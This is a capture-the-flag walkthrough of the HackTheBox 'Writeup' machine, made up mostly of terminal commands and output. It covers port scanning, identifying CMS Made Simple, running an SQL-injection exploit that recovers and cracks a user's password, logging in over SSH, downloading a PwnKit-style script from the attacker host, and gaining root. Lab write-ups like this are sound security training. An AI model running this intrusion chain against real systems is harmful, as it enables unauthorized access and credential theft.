title: HackTheBox-Writeup author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Writeup.png tags:
Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV -p22,80 -oN Writeup
[sudo] crazyinside 的密码:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CST
Nmap scan report for
Host is up (0.20s latency).
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)
| 256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)
|_ 256 93eaa84042c1a83385b35600621ca0ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
zsh: segmentation fault sudo nmap -sC -sV -p22,80 -oN Writeup
Crazy:~/HackThebox/Writeup$ curl
# __
# _( |@@|
# (__/__ --/ __
# ___|----| | __
# }{ / )_ / _
# /__/ __O (__
# (--/--) __/
# _)( )(_
# `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Crazy:~/HackThebox/Writeup$ whatweb [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]
./exploit.py -u --crack --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 21 21:49:32 2022 from
jkr@writeup:~$ sudo -l
-bash: sudo: command not found
jkr@writeup:~$ cat user.txt
jkr@writeup:~$ wget
--2022-08-21 21:51:50--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘pwk.py’
pwk.py 100%[=============================================================>] 3.37K --.-KB/s in 0.01s
2022-08-21 21:51:51 (236 KB/s) - ‘pwk.py’ saved [3448/3448]
jkr@writeup:~$ ls
pwk.py sharedvuln user.txt
jkr@writeup:~$ python pwk.py
File "pwk.py", line 43
cargv = (c_char_p * (len(argv) + 1))(*argv, None)
SyntaxError: only named arguments may follow *expression
jkr@writeup:~$ python3 pwk.py
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)
# cat /root/root.txt
